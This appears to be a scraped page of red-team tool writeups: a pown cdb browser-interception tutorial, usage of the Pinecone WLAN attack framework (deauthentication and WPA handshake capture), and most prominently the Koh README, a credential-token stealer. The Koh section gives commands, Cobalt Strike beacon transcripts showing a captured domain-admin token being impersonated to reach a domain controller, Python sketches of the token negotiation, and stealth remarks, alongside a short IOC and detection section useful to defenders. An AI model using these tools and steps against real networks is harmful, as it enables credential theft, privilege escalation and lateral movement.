
pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with preferred settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagement.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB, we need a Chrome browser instance (other browsers are also supported) with the Chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with the pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.



Pinecone - A WLAN Red Team Framework

19 July 2022 at 12:30
By: Zion3R


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed; if not, it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

[email protected]:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, which can be seen by typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in the background (for example, scripts/infrastructure/ap), you can stop it with the stop command while it is running.

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, the Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs are stored in the tmp/ directory, also under the project root folder.



Koh - The Token Stealer

18 July 2022 at 12:30
By: Zion3R


Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.


Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).

Compilation

We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and Koh.bin Donut-built PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

  [ Instance type : Embedded
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman
[ File type : .NET EXE
[ Parameters : capture
[ Target CPU : x86+amd64
[ AMSI/WDLP : abort

Donut's license is BSD 3-clause.

Usage

Koh.exe <list | monitor | capture> [GroupSID1 GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied on the command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: list

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:
S-1-5-21-937929760-3187473010-80948926-512

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\build.sh script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64.

Usage

beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the given LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.

Server:

C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : [email protected]
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : [email protected]
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : [email protected]
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : [email protected]
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : [email protected]
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : [email protected]
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
S-1-5-21-937929760-3187473010-80948926-513
S-1-5-21-937929760-3187473010-80948926-512
S-1-5-21-937929760-3187473010-80948926-525
S-1-5-21-937929760-3187473010-80948926-572

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> PerfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is established on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned to the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the information described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists to it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was applied back to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.

Approach

Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.
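
For the easy half, pywin32 exposes the same API, so the enumeration can be sketched in a few lines of Python (run from an elevated context; the dictionary keys follow pywin32's LsaGetLogonSessionData, and LogonType 3 denotes a network logon):

import win32security

for luid in win32security.LsaEnumerateLogonSessions():
    data = win32security.LsaGetLogonSessionData(luid)
    if data.get("LogonType") == 3:
        continue  # skip network logons, mirroring Koh's (non-network) listing
    print("%s\\%s  LUID: %s  Type: %s" % (
        data.get("LogonDomain"), data.get("UserName"),
        data.get("LogonId"), data.get("LogonType")))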

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege, however this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're now presented with another problem: given a "leaked"/held open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.
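
To make that SSPI loop concrete, here is a rough Python sketch using pywin32's sspi wrapper, mirroring its own credential-validation demo: it negotiates a context against ourselves, extracts a token with QuerySecurityContextToken(), and walks the token's group SIDs. This is only an illustration for the current credentials; pywin32's wrapper does not expose AcquireCredentialsHandle()'s pvLogonID parameter, so it cannot reproduce Koh's LUID targeting:

import sspi
import win32security

# Act as client and server to ourselves (NTLM needs no SPN for a loopback demo)
client = sspi.ClientAuth("NTLM")
server = sspi.ServerAuth("NTLM")

buf = None
while True:
    err, buf = client.authorize(buf)   # wraps InitializeSecurityContext()
    err, buf = server.authorize(buf)   # wraps AcceptSecurityContext()
    if err == 0:
        break

# QuerySecurityContextToken(): a usable token for the negotiated context
token = server.ctxt.QuerySecurityContextToken()

# Filter on the token itself by walking its group SIDs
for sid, attrs in win32security.GetTokenInformation(token, win32security.TokenGroups):
    print(win32security.ConvertSidToStringSid(sid))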

Advantages/Disadvantages Versus Traditional Credential Extraction

Advantages

  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.

Disadvantages

  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, existing ticket/credential extraction can still be done on the leaked logon session.
  • May cause instability if a large number of sessions are leaked, though this can be mitigated with token group SID filtering and by restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time. This is one of the weirder and more frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However, if the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails ¯\_(ツ)_/¯

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle works in this context, but the result errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.

IOCs

To quote @tifkin_ "Everything is stealthy until someone is looking for it." While Koh's approach is slightly different than others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts it opens up a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is password, so sending password list to any \\.\pipe\imposecost pipe will let you confirm if Koh is indeed running. The default impersonation pipe used is \\.\pipe\imposingcost.
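
Along those lines, a defender could script the pipe check; a minimal pywin32 sketch (the single-message "password list" framing is an assumption based on the description above, not a documented protocol):

import win32file

PIPE = r"\\.\pipe\imposecost"

# If CreateFile fails, nothing is listening on Koh's default pipe name
handle = win32file.CreateFile(
    PIPE,
    win32file.GENERIC_READ | win32file.GENERIC_WRITE,
    0, None, win32file.OPEN_EXISTING, 0, None)

# Assumed framing: the default password ("password") plus the "list" command
win32file.WriteFile(handle, b"password list")
_, reply = win32file.ReadFile(handle, 65536)
print(reply.decode(errors="replace"))
handle.Close()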

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is performed to perform a getsystem type elevation.

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking of some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions or the specific AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext, specifically using a LUID in AcquireCredentialsHandle) could be explored for effectiveness, but alas, I am not an EDR.

TODO

  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug

